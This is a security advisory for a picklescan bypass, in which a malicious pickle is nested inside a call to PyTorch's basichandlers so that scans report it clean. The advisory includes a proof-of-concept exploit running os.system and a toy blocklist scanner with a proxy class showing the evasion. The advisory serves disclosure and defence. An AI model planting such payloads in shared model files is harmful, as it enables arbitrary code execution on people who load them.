GHSA-h3qp-7fh3-f8h4: picklescan: detection bypass via PyTorch proxy RCE

GHSA-h3qp-7fh3-f8h4 MEDIUM
Published August 22, 2025
CISO Take

Any MLOps pipeline that uses picklescan to gate model loading is exposed: attackers can distribute malicious pickle files that pass the scan as clean and execute arbitrary code on load. Upgrade picklescan to v0.0.28 immediately and audit any model files validated with older versions. Until patched, treat all externally sourced pickle files as untrusted regardless of scan results, and consider switching to the safetensors format for model storage.

Risk Assessment

Despite a MEDIUM severity label (no CVSS vector has been published), operational risk for AI/ML environments is HIGH. The attack exploits misplaced trust in a dedicated security control, which is more dangerous than a straightforward RCE because victims explicitly believe they are protected. The PoC is trivial to implement, requires no special privileges, and targets a widespread pattern in MLOps pipelines (scan-then-load). Any team that has operationalized picklescan as a security gate is directly exposed.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip <= 0.0.27 0.0.28


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to v0.0.28 on all systems—this is the only complete fix.

  2. AUDIT

    Re-scan any pickle files previously cleared by picklescan <= 0.0.27; treat them as potentially compromised.

  3. ARCHITECTURE

    Migrate model serialization to safetensors or ONNX where feasible—these formats are not affected by pickle deserialization attacks.

  4. SANDBOXING

    Load pickle files in isolated environments (containers with no network, minimal filesystem access, dropped privileges) regardless of scan results.

  5. DETECTION

    Alert on picklescan processes using versions < 0.0.28; monitor for unexpected process spawning (e.g., os.system calls) during model load operations.

  6. SUPPLY CHAIN

    Enforce model provenance checks (checksums, signed artifacts) in addition to content scanning.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
8.4 - AI system supply chain
NIST AI RMF
GOVERN 6.2 - Policies and procedures for AI supply chain risk
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-h3qp-7fh3-f8h4?

Any MLOps pipeline that uses picklescan to gate model loading is exposed: attackers can distribute malicious pickle files that pass the scan as clean and execute arbitrary code on load. Upgrade picklescan to v0.0.28 immediately and audit any model files validated with older versions. Until patched, treat all externally sourced pickle files as untrusted regardless of scan results, and consider switching to the safetensors format for model storage.

Is GHSA-h3qp-7fh3-f8h4 actively exploited?

No confirmed active exploitation of GHSA-h3qp-7fh3-f8h4 has been reported, but organizations should still patch proactively.

How to fix GHSA-h3qp-7fh3-f8h4?

1. PATCH: Upgrade picklescan to v0.0.28 on all systems—this is the only complete fix. 2. AUDIT: Re-scan any pickle files previously cleared by picklescan <= 0.0.27; treat them as potentially compromised. 3. ARCHITECTURE: Migrate model serialization to safetensors or ONNX where feasible—these formats are not affected by pickle deserialization attacks. 4. SANDBOXING: Load pickle files in isolated environments (containers with no network, minimal filesystem access, dropped privileges) regardless of scan results. 5. DETECTION: Alert on picklescan processes using versions < 0.0.28; monitor for unexpected process spawning (e.g., os.system calls) during model load operations. 6. SUPPLY CHAIN: Enforce model provenance checks (checksums, signed artifacts) in addition to content scanning.

What systems are affected by GHSA-h3qp-7fh3-f8h4?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, ML model registries, MLOps CI/CD pipelines, data science platforms with user uploads.

What is the CVSS score for GHSA-h3qp-7fh3-f8h4?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Summary

The vulnerability abuses torch.utils.data.datapipes.utils.decoder.basichandlers, a legitimate PyTorch library function, as a proxy to execute a nested malicious pickle.

Details

The attack executes in two steps. First, the attacker crafts a payload whose __reduce__ method returns a call to torch.utils.data.datapipes.utils.decoder.basichandlers with the extension 'pickle' and a nested malicious pickle as its arguments. Because picklescan does not flag this function as dangerous, the file scans clean. When the victim, trusting the scan result, calls pickle.load() on the malicious file, basichandlers deserializes the nested payload, leading to remote code execution.

PoC

```
import os
import pickle

import torch.utils.data.datapipes.utils.decoder as decoder


class EvilTorchUtilsDataDatapipesDecoder:
    def __reduce__(self):
        extension = 'pickle'

        class RCE:
            def __reduce__(self):
                return os.system, ('whoami',)

        data = pickle.dumps(RCE())
        return decoder.basichandlers, (extension, data)
```

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded, enabling supply chain attacks that distribute infected pickle files across ML models, APIs, or saved Python objects.

Credits

https://github.com/FredericDT
https://github.com/Qhaoduoyu
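To make the bypass concrete without depending on PyTorch, the sketch below reproduces the pattern with stand-ins: dispatcher plays the role of basichandlers, and toy_scan is a simplified opcode-based blocklist scanner in the spirit of picklescan (not its actual code). The outer pickle's only global is the "trusted" dispatcher, so the blocklist never sees the os.system reference hidden inside the nested bytes argument.

```python
import os
import pickle
import pickletools

# os.system resolves to posix.system on Unix and nt.system on Windows.
BLOCKLIST = {("posix", "system"), ("nt", "system"), ("os", "system")}


def toy_scan(data: bytes) -> bool:
    """Simplified blocklist scanner: walk the pickle opcodes and flag any
    blocklisted global reference. Bytes arguments are opaque to it."""
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)  # candidate module/name strings
        elif op.name == "STACK_GLOBAL":
            # STACK_GLOBAL resolves the last two pushed strings.
            if len(strings) >= 2 and (strings[-2], strings[-1]) in BLOCKLIST:
                return True
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            if (module, name) in BLOCKLIST:
                return True
    return False


def dispatcher(fmt: str, data: bytes):
    """Stand-in for torch...decoder.basichandlers: a 'trusted' helper that
    deserializes its payload when told it is a pickle."""
    if fmt == "pickle":
        return pickle.loads(data)


class EvilInner:
    def __reduce__(self):
        return os.system, ("true",)  # harmless command for demonstration


class Proxy:
    def __reduce__(self):
        # Hide the malicious pickle inside an opaque bytes argument to a
        # function the scanner does not consider dangerous.
        return dispatcher, ("pickle", pickle.dumps(EvilInner()))
```

Scanning pickle.dumps(EvilInner()) directly trips the blocklist, while pickle.dumps(Proxy()) scans clean even though loading it would execute the same command.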

Exploitation Scenario

An adversary publishes a PyTorch model checkpoint to a public registry or contributes it to an open-source project. The payload embeds a malicious __reduce__ method that delegates to torch.utils.data.datapipes.utils.decoder.basichandlers—a legitimate PyTorch function not on picklescan's blocklist. The victim's MLOps pipeline fetches the model, runs picklescan validation (result: CLEAN), and proceeds to load it via pickle.load() in a training job or inference service. At load time, the embedded payload executes arbitrary OS commands—establishing a reverse shell, exfiltrating model weights, injecting backdoors into downstream artifacts, or pivoting to cloud infrastructure via the ML worker's IAM role.

Timeline

Published
August 22, 2025
Last Modified
August 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities